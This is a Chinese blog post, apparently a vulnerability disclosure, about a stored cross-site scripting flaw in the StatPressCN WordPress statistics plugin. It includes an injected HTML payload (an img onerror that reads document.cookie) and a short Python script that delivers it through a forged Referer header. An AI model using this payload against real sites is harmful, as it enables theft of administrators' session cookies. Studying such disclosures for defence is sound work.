wordpress插件StatPressCN存XSS跨站获取用户cookie

作者：qxz_xp 发布：2013-10-06 12:12 分类：黑客技术, 黑客攻防暂无评论

statpresscn是流行的wordpress站点统计插件的中文版，虽然已经很久未更新，而且wp官网统计也仅仅不到10万次下载；但因为这个插件被某国内wp托管服务商（对方宣称拥有数百万用户）作为内置插件被默认启用，所以危害还是有些大的。

2013102122032158

在统计页面中，可以详细记录站点的每次访问。其中流量来源展示时，提供一个表格输出来源网站，而statpress的中文版未进行字符串过滤直接输出。

攻击代码构建

正常用户访问时，统计展示页面输出如下：

<td> <a href = “http://blog.leniy.org” target = “_statpresscn” > http://blog.leniy.org </a></td>

通过构建refer的值，可以将其更改为：

<td> <a href = ” > “><img src=a onerror=alert(document.cookie)>’ target=_statpresscn>’>” > <img src = a onerror = alert ( document . cookie ) > </a></td>

则python代码如下：

# -*- coding: utf-8 -*-

“””
Created: on Sun Sep 01 22:34:17 2013

Modified on Mon Sep 30 10:56:31 2013

@author: Leniy
“””

import urllib2

request = urllib2 . Request ( ‘http://test.leniy.org/?s=’ )

request . add_header ( ‘User-Agent’ , ‘Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5’ )

#request.add_header(‘Referer’, ‘http://blog.leniy.org’)

request . add_header ( ‘Referer’ , ‘\’>”><img src=a onerror=alert(document.cookie)>’ )response = urllib2 . urlopen ( request )

原创文章转载请注明：转载自七行者博客

本文固定链接: https://www.qxzxp.com/3471.html

QQ空间微信腾讯微博新浪微博我的搜狐人人网天涯社区百度贴吧更多

【上一篇】帝国cms7.0 后台拿shell两种方法
【下一篇】后台目录asp，php，jsp，E编辑器和F编辑器一句话等密码字典

wordpress插件StatPressCN存XSS跨站获取用户cookie：等您坐沙发呢！

发表评论

博客搜索

博客日历

2024年 11月
一	二	三	四	五	六	日
	1	2	3
4	5	6	7	8	9	10
11	12	13	14	15	16	17
18	19	20	21	22	23	24
25	26	27	28	29	30

博客目录

电脑维修 (22)
- 其它技术 (8)
- 台式机维修 (5)
- 显示器维修 (3)
- 电脑软件 (3)
- 笔记本维修 (4)
网站运营 (65)
- seo优化 (45)
- 新闻资讯 (3)
- 网上创业 (8)
- 网站建设 (10)
- 网站推广 (7)
网络安全 (89)
- 入侵检测 (6)
- 安全知识 (27)
- 最新资讯 (21)
- 漏洞公布 (35)
- 病毒预警 (8)
腾讯QQ (81)
- QQ个性签名 (10)
- QQ个性网名 (18)
- QQ头像 (45)
- QQ技术 (6)
- QQ空间 (4)
黑客攻防 (486)
- 业界新闻 (178)
- 社工相关 (27)
- 菜鸟入门 (119)
- 黑客工具 (105)
- 黑客技术 (139)

wordpress插件StatPressCN存XSS跨站获取用户cookie

wordpress插件StatPressCN存XSS跨站获取用户cookie：等您坐沙发呢！

发表评论

博客搜索

博客日历

近期文章

归档

博客目录

云标签

最新日志热评日志随机日志

近期评论